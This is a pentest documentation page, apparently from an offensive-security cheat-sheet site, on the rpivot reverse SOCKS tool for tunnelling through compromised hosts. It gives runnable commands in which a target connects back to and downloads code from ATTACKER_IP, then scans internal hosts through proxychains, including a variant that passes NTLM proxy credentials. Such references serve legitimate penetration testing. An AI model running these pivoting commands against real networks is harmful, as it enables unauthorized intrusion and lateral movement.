> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# rpivot

> rpivot reverse SOCKS proxy: tunnel through compromised hosts when direct connections are blocked.

## Overview

rpivot creates reverse SOCKS proxy — target connects back to attacker. Useful when target can reach attacker but not vice versa (firewall/NAT).

## Download

```bash theme={"dark"}
git clone https://github.com/klsecservices/rpivot.git
```

***

## Setup

### Attacker (Server)

```bash theme={"dark"}
python2 server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080
```

### Target (Client)

```bash theme={"dark"}
python2 client.py --server-ip ATTACKER_IP --server-port 9999
```

SOCKS4 proxy on attacker at `127.0.0.1:1080`.

***

## Transfer Client to Target

```bash theme={"dark"}
# Attacker — serve files
cd rpivot && python3 -m http.server 8000

# Target — download
wget http://ATTACKER_IP:8000/client.py
```

***

## Use with ProxyChains

```bash theme={"dark"}
# /etc/proxychains4.conf
socks4 127.0.0.1 1080
```

```bash theme={"dark"}
proxychains nmap -sT -Pn INTERNAL_TARGET
proxychains curl http://INTERNAL_TARGET
```

***

## Through NTLM Proxy

If target is behind corporate proxy with NTLM auth:

```bash theme={"dark"}
python2 client.py --server-ip ATTACKER_IP --server-port 9999 --ntlm-proxy-ip PROXY_IP --ntlm-proxy-port 8080 --domain DOMAIN --username USER --password PASS
```

***

## Notes

* Requires Python 2 on target
* SOCKS4 only (not SOCKS5)
* Single-hop pivot
* Lightweight — just `client.py` needed on target

***

## Quick Reference

| Task       | Command                                                     |
| ---------- | ----------------------------------------------------------- |
| Server     | `python2 server.py --server-port 9999 --proxy-port 1080`    |
| Client     | `python2 client.py --server-ip ATTACKER --server-port 9999` |
| Proxy type | SOCKS4 on `127.0.0.1:1080`                                  |
| NTLM proxy | Add `--ntlm-proxy-ip/port/domain/user/pass`                 |
